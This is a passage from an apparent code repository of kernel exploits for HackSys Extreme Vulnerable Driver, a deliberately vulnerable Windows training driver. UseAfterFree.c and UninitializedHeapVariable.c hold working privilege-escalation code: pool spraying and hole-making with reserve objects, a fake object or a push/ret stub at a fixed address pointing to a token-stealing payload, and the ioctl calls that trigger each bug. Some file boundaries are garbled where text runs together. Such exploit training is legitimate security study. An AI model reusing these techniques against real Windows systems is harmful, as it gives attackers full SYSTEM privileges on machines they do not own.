33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UninitializedHeapVariable.c
43 |
44 | Abstract:
45 | This module implements the exploit for Uninitialized
46 | Heap Variable Vulnerability implemented in HackSys
47 | Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "UninitializedHeapVariable.h"
52 | #define PAGE_ALLOC 0x400
53 | #define MUTEX_NAME_LEN 120
54 |
55 |
56 | DWORD WINAPI UninitializedHeapVariableThread(LPVOID Parameter) {
57 | /*CONST PTCHAR Message =
58 | "\t \t\n"
59 | "\t + - + - + - + - + - + - + - + - + - + \t\n"
60 | "\t | C | H | A | L | L | E | N | G | E | \t\n"
61 | "\t + - + - + - + - + - + - + - + - + - + \t\n"
62 | "\t \t\n"
63 | "\t Write the exploit for use of Uninitialized Heap Variable \t\n"
64 | "\t \t\n"
65 | "\t Need Help? \t\n"
66 | "\t \t\n"
67 | "\t ashfaq[at]payatu[dot]com \t\n"
68 | "\t \t\n";
69 |
70 | DEBUG_ERROR(Message);
71 |
72 | return EXIT_FAILURE;*/
73 | int i,j,m;
74 | ULONG BytesReturned;
75 | HMODULE hNtDll = NULL;
76 | PVOID VM_Address = NULL;
77 | ULONG Address = 0;
78 | ULONG CallResult = 0;
79 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
80 | SIZE_T RegionSize = 0x1000;
81 | HANDLE hFile = NULL;
82 |
83 | char aMutexName[MUTEX_NAME_LEN];
84 | HANDLE hMutex[PAGE_ALLOC];
85 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
86 | ULONG MagicValue = 0xBAADF00D;
87 |
88 | __try{
89 | DEBUG_INFO("\t[+] Resolving Kernel APIs\n");//Get Kernel API just like NtAllocVirtualMemory and CreateMutex
90 |
91 | hNtDll = LoadLibrary("ntdll.dll");//Load ntdll.dll
92 |
93 | if(!hNtDll)//if load failure
94 | {
95 | DEBUG_ERROR("\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
96 | exit(EXIT_FAILURE);
97 | }
98 |
99 | NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtDll, "NtAllocateVirtualMemory");//get NtAllocateVirtualMemory
100 |
101 | if (!NtAllocateVirtualMemory) {
102 | DEBUG_ERROR("\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
103 | exit(EXIT_FAILURE);
104 | }
105 | else {
106 | DEBUG_INFO("\t\t[+] NtAllocateVirtualMemory: 0x%p\n", NtAllocateVirtualMemory);
107 | }
108 |
109 | DEBUG_INFO("\t[+] Alloc Memory\n");
110 |
111 | //Address = ('a'+rand()%26<<16)+'a'+rand()%26;
112 | Address = 0x00460046;
113 | VM_Address = (PVOID)Address;
114 | CallResult = NtAllocateVirtualMemory((HANDLE)0xFFFFFFFF,
115 | &VM_Address,
116 | 0,
117 | &RegionSize,
118 | MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
119 | PAGE_EXECUTE_READWRITE);
120 |
121 | if (CallResult==0){
122 | DEBUG_INFO("\t\t[+] Allocated memory at VM_Address 0x%p\n", VM_Address);
123 | }
124 | else
125 | {
126 | DEBUG_ERROR("\t\t[-] Create Mutex failed: error 0x%X\n", GetLastError());
127 | exit(EXIT_FAILURE);
128 | }
129 | DEBUG_INFO("\t[+] Kernel Heap Spray\n");
130 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
131 |
132 |
133 | *(PBYTE)Address = 0x68;
134 | *(PULONG)(Address+1) = (ULONG)EopPayload;
135 | *(PBYTE)(Address+5) = 0xc3;
136 |
137 | for (j=0; j.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UninitializedHeapVariable.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Uninitialized Heap Variable Vulnerability
47 | implemented in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __UNINITIALIZED_HEAP_VARIABLE_H__
52 | #define __UNINITIALIZED_HEAP_VARIABLE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | DWORD WINAPI UninitializedHeapVariableThread(LPVOID Parameter);
59 |
60 | #endif //__UNINITIALIZED_HEAP_VARIABLE_H__
61 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/UninitializedStackVariable.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UninitializedStackVariable.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Uninitialized Stack Variable Vulnerability
47 | implemented in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __UNINITIALIZED_STACK_VARIABLE_H__
52 | #define __UNINITIALIZED_STACK_VARIABLE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | VOID ResolveKernelAPIs();
59 | DWORD WINAPI UninitializedStackVariableThread(LPVOID Parameter);
60 |
61 | #endif //__UNINITIALIZED_STACK_VARIABLE_H__
62 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/UseAfterFree.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UseAfterFree.c
43 |
44 | Abstract:
45 | This module implements the exploit for Use After Free
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "UseAfterFree.h"
52 |
53 | VOID SprayNonPagedPoolWithReserveObjects() {
54 | UINT32 i = 0;
55 | HMODULE hModule = NULL;
56 | NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
57 |
58 | hModule = LoadLibraryA("ntdll.dll");
59 |
60 | if (!hModule) {
61 | DEBUG_ERROR("\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
62 | exit(EXIT_FAILURE);
63 | }
64 |
65 | NtAllocateReserveObject = (NtAllocateReserveObject_t)GetProcAddress(hModule, "NtAllocateReserveObject");
66 |
67 | if (!NtAllocateReserveObject) {
68 | DEBUG_ERROR("\t\t[-] Failed Resolving NtAllocateReserveObject: 0x%X\n", GetLastError());
69 | exit(EXIT_FAILURE);
70 | }
71 |
72 | RtlFillMemory(ReserveObjectArrayA, sizeof(ReserveObjectArrayA), 0x0);
73 | RtlFillMemory(ReserveObjectArrayB, sizeof(ReserveObjectArrayB), 0x0);
74 |
75 | for (i = 0; i < 10000; i++) {
76 | NtStatus = NtAllocateReserveObject(&ReserveObjectArrayA[i], 0, IO_COMPLETION_OBJECT);
77 |
78 | if (NtStatus != STATUS_SUCCESS) {
79 | DEBUG_ERROR("\t\t[-] Failed To Allocate Reserve Objects: 0x%X\n", GetLastError());
80 | exit(EXIT_FAILURE);
81 | }
82 | }
83 |
84 | for (i = 0; i < 5000; i++) {
85 | NtStatus = NtAllocateReserveObject(&ReserveObjectArrayB[i], 0, IO_COMPLETION_OBJECT);
86 |
87 | if (NtStatus != STATUS_SUCCESS) {
88 | DEBUG_ERROR("\t\t[-] Failed To Allocate Reserve Objects: 0x%X\n", GetLastError());
89 | exit(EXIT_FAILURE);
90 | }
91 | }
92 | }
93 |
94 | VOID CreateHolesInNonPagedPoolByClosingReserveObjects() {
95 | UINT32 i = 0;
96 |
97 | for (i = 0; i < 5000; i += 2) {
98 | if (!CloseHandle(ReserveObjectArrayB[i])) {
99 | DEBUG_ERROR("\t\t[-] Failed To Close Reserve Objects Handle: 0x%X\n", GetLastError());
100 | exit(EXIT_FAILURE);
101 | }
102 | }
103 | }
104 |
105 | VOID FreeReserveObjects() {
106 | UINT32 i = 0;
107 |
108 | for (i = 0; i < 10000; i++) {
109 | if (!CloseHandle(ReserveObjectArrayA[i])) {
110 | DEBUG_ERROR("\t\t[-] Failed To Close Reserve Objects Handle: 0x%X\n", GetLastError());
111 | exit(EXIT_FAILURE);
112 | }
113 | }
114 |
115 | for (i = 1; i < 5000; i +=2) {
116 | if (!CloseHandle(ReserveObjectArrayB[i])) {
117 | DEBUG_ERROR("\t\t[-] Failed To Close Reserve Objects Handle: 0x%X\n", GetLastError());
118 | exit(EXIT_FAILURE);
119 | }
120 | }
121 | }
122 |
123 | DWORD WINAPI UseAfterFreeThread(LPVOID Parameter) {
124 | UINT32 i = 0;
125 | HANDLE hFile = NULL;
126 | ULONG BytesReturned;
127 | PFAKE_OBJECT FakeObject = NULL;
128 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
129 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
130 |
131 | __try {
132 | DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
133 |
134 | if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
135 | DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
136 | }
137 | else {
138 | DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
139 | }
140 |
141 | // Get the device handle
142 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
143 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
144 |
145 | hFile = GetDeviceHandle(FileName);
146 |
147 | if (hFile == INVALID_HANDLE_VALUE) {
148 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
149 | exit(EXIT_FAILURE);
150 | }
151 | else {
152 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
153 | }
154 |
155 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
156 |
157 | DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");
158 |
159 | // Allocate the Heap chunk
160 | FakeObject = (PFAKE_OBJECT)HeapAlloc(GetProcessHeap(),
161 | HEAP_ZERO_MEMORY,
162 | sizeof(FAKE_OBJECT));
163 |
164 | if (!FakeObject) {
165 | DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
166 | exit(EXIT_FAILURE);
167 | }
168 | else {
169 | DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", FakeObject);
170 | DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", sizeof(FAKE_OBJECT));
171 | }
172 |
173 | DEBUG_INFO("\t\t[+] Preparing FAKE_OBJECT structure\n");
174 |
175 | RtlFillMemory((PVOID)FakeObject, sizeof(FAKE_OBJECT), 0x41);
176 |
177 | FakeObject->buffer[sizeof(FakeObject->buffer) - 1] = '\0';
178 | *(PULONG)FakeObject = (ULONG)EopPayload;
179 |
180 | DEBUG_INFO("\t\t\t[+] FakeObject Value: 0x%p\n", *(PULONG)FakeObject);
181 | DEBUG_INFO("\t\t\t[+] FakeObject Address: 0x%p\n", FakeObject);
182 | DEBUG_INFO("\t\t\t[+] FAKE_OBJECT Size: 0x%X\n", sizeof(FAKE_OBJECT));
183 |
184 | DEBUG_INFO("\t\t\t[+] EoP Payload: 0x%p\n", EopPayload);
185 |
186 | DEBUG_INFO("\t\t[+] Preparing NonPaged Kernel Pool Layout\n");
187 |
188 | DEBUG_INFO("\t\t\t[+] Spraying With Reserve Objects\n");
189 |
190 | SprayNonPagedPoolWithReserveObjects();
191 |
192 | DEBUG_INFO("\t\t\t[+] Creating Holes\n");
193 |
194 | CreateHolesInNonPagedPoolByClosingReserveObjects();
195 |
196 | DEBUG_INFO("\t\t[+] Working With Vulnerable UaF Object In NonPaged Pool\n");
197 | DEBUG_INFO("\t\t\t[+] Allocating UaF Object\n");
198 |
199 | OutputDebugString("****************Kernel Mode****************\n");
200 |
201 | DeviceIoControl(hFile,
202 | HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT,
203 | NULL,
204 | 0,
205 | NULL,
206 | 0,
207 | &BytesReturned,
208 | NULL);
209 |
210 | OutputDebugString("****************Kernel Mode****************\n");
211 |
212 | DEBUG_INFO("\t\t\t[+] Freeing UaF Object\n");
213 |
214 | OutputDebugString("****************Kernel Mode****************\n");
215 |
216 | DeviceIoControl(hFile,
217 | HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT,
218 | NULL,
219 | 0,
220 | NULL,
221 | 0,
222 | &BytesReturned,
223 | NULL);
224 |
225 | OutputDebugString("****************Kernel Mode****************\n");
226 |
227 | // Allocate the FAKE_OBJECT multiple times to take up the freed memory chunk
228 | DEBUG_INFO("\t\t\t[+] Filling Freed Chunks\n");
229 |
230 | OutputDebugString("****************Kernel Mode****************\n");
231 |
232 | for (i = 0; i < 0x1000; i++) {
233 | DeviceIoControl(hFile,
234 | HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT,
235 | (LPVOID)FakeObject,
236 | 0,
237 | NULL,
238 | 0,
239 | &BytesReturned,
240 | NULL);
241 | }
242 |
243 | OutputDebugString("****************Kernel Mode****************\n");
244 |
245 | DEBUG_INFO("\t\t\t[+] Freeing Reserve Objects\n");
246 |
247 | FreeReserveObjects();
248 |
249 | DEBUG_MESSAGE("\t[+] Triggering Kernel Use After Free\n");
250 |
251 | OutputDebugString("****************Kernel Mode****************\n");
252 |
253 | DeviceIoControl(hFile,
254 | HACKSYS_EVD_IOCTL_USE_UAF_OBJECT,
255 | NULL,
256 | 0,
257 | NULL,
258 | 0,
259 | &BytesReturned,
260 | NULL);
261 |
262 | OutputDebugString("****************Kernel Mode****************\n");
263 |
264 | HeapFree(GetProcessHeap(), 0, (LPVOID)FakeObject);
265 |
266 | FakeObject = NULL;
267 | }
268 | __except (EXCEPTION_EXECUTE_HANDLER) {
269 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
270 | exit(EXIT_FAILURE);
271 | }
272 |
273 | return EXIT_SUCCESS;
274 | }
275 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/UseAfterFree.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UseAfterFree.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Use After Free Vulnerability implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __USE_AFTER_FREE_H__
52 | #define __USE_AFTER_FREE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | #define IO_COMPLETION_OBJECT 1
59 |
60 | typedef struct _FAKE_OBJECT {
61 | CHAR buffer[0x58];
62 | } FAKE_OBJECT, *PFAKE_OBJECT;
63 |
64 | HANDLE ReserveObjectArrayA[10000];
65 | HANDLE ReserveObjectArrayB[5000];
66 |
67 | VOID FreeReserveObjects();
68 | VOID SprayNonPagedPoolWithReserveObjects();
69 | DWORD WINAPI UseAfterFreeThread(LPVOID Parameter);
70 | VOID CreateHolesInNonPagedPoolByClosingReserveObjects();
71 |
72 | #endif //__USE_AFTER_FREE_H__
73 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/arg.h:
--------------------------------------------------------------------------------
1 | #ifndef __ARG_H__
2 | #define __ARG_H__
3 |
4 | extern char *argv0;
5 |
6 | #define USED(x) ((void)(x))
7 |
8 | #define ARGBEGIN for (argv0 = *argv, argv++, argc--;\
9 | argv[0] && argv[0][1]\
10 | && argv[0][0] == '-';\
11 | argc--, argv++) {\
12 | char _argc;\
13 | char **_argv;\
14 | int brk;\
15 | if (argv[0][1] == '-' && argv[0][2] == '\0') {\
16 | argv++;\
17 | argc--;\
18 | break;\
19 | }\
20 | for (brk = 0, argv[0]++, _argv = argv;\
21 | argv[0][0] && !brk;\
22 | argv[0]++) {\
23 | if (_argv != argv)\
24 | break;\
25 | _argc = argv[0][0];\
26 | switch (_argc)
27 |
28 | #define ARGEND }\
29 | USED(_argc);\
30 | }\
31 | USED(argv);\
32 | USED(argc);
33 |
34 | #define ARGC() _argc
35 |
36 | #define EARGF(x) ((argv[0][1] == '\0' && argv[1] == NULL)?\
37 | ((x), abort(), (char *)0) :\
38 | (brk = 1, (argv[0][1] != '\0')?\
39 | (&argv[0][1]) :\
40 | (argc--, argv++, argv[0])))
41 |
42 | #define ARGF() ((argv[0][1] == '\0' && argv[1] == NULL)?\
43 | (char *)0 :\
44 | (brk = 1, (argv[0][1] != '\0')?\
45 | (&argv[0][1]) :\
46 | (argc--, argv++, argv[0])))
47 |
48 | #endif //__ARG_H__
49 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/ipch/hacksysevdexploit-6f66b5a3/hacksysevdexploit-e885ecc0.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/ipch/hacksysevdexploit-6f66b5a3/hacksysevdexploit-e885ecc0.ipch
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/README.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/README.txt
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Stop_by_win10", "Stop_by_win10\Stop_by_win10.vcxproj", "{680F7C84-6509-4642-93B3-FE631C50EA12}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Debug|Win32.Build.0 = Debug|Win32
16 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Debug|x64.ActiveCfg = Debug|x64
17 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Debug|x64.Build.0 = Debug|x64
18 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Release|Win32.ActiveCfg = Release|Win32
19 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Release|Win32.Build.0 = Release|Win32
20 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Release|x64.ActiveCfg = Release|x64
21 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10.suo
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/HEVD_Stop_By_Win10.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 |
5 | //extern "C" void Int_3();
6 |
7 | typedef enum _SYSTEM_INFORMATION_CLASS {
8 | SystemBasicInformation = 0,
9 | SystemPerformanceInformation = 2,
10 | SystemTimeOfDayInformation = 3,
11 | SystemProcessInformation = 5,
12 | SystemProcessorPerformanceInformation = 8,
13 | SystemModuleInformation = 11,
14 | SystemInterruptInformation = 23,
15 | SystemExceptionInformation = 33,
16 | SystemRegistryQuotaInformation = 37,
17 | SystemLookasideInformation = 45
18 | } SYSTEM_INFORMATION_CLASS;
19 |
20 | typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
21 | HANDLE Section;
22 | PVOID MappedBase;
23 | PVOID ImageBase;
24 | ULONG ImageSize;
25 | ULONG Flags;
26 | USHORT LoadOrderIndex;
27 | USHORT InitOrderIndex;
28 | USHORT LoadCount;
29 | USHORT OffsetToFileName;
30 | UCHAR FullPathName[256];
31 | } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
32 |
33 | typedef struct _SYSTEM_MODULE_INFORMATION {
34 | ULONG NumberOfModules;
35 | SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
36 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
37 |
38 | typedef struct _PROCESS_BASIC_INFORMATION
39 | {
40 | LONG ExitStatus;
41 | PVOID PebBaseAddress;
42 | ULONG_PTR AffinityMask;
43 | LONG BasePriority;
44 | ULONG_PTR UniqueProcessId;
45 | ULONG_PTR ParentProcessId;
46 | } PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
47 |
48 | // Partial PEB
49 | typedef struct _PEB {
50 | BOOLEAN InheritedAddressSpace;
51 | BOOLEAN ReadImageFileExecOptions;
52 | BOOLEAN BeingDebugged;
53 | union
54 | {
55 | BOOLEAN BitField;
56 | struct
57 | {
58 | BOOLEAN ImageUsesLargePages : 1;
59 | BOOLEAN IsProtectedProcess : 1;
60 | BOOLEAN IsLegacyProcess : 1;
61 | BOOLEAN IsImageDynamicallyRelocated : 1;
62 | BOOLEAN SkipPatchingUser32Forwarders : 1;
63 | BOOLEAN SpareBits : 3;
64 | };
65 | };
66 | HANDLE Mutant;
67 |
68 | PVOID ImageBaseAddress;
69 | PVOID Ldr;
70 | PVOID ProcessParameters;
71 | PVOID SubSystemData;
72 | PVOID ProcessHeap;
73 | PRTL_CRITICAL_SECTION FastPebLock;
74 | PVOID AtlThunkSListPtr;
75 | PVOID IFEOKey;
76 | union
77 | {
78 | ULONG CrossProcessFlags;
79 | struct
80 | {
81 | ULONG ProcessInJob : 1;
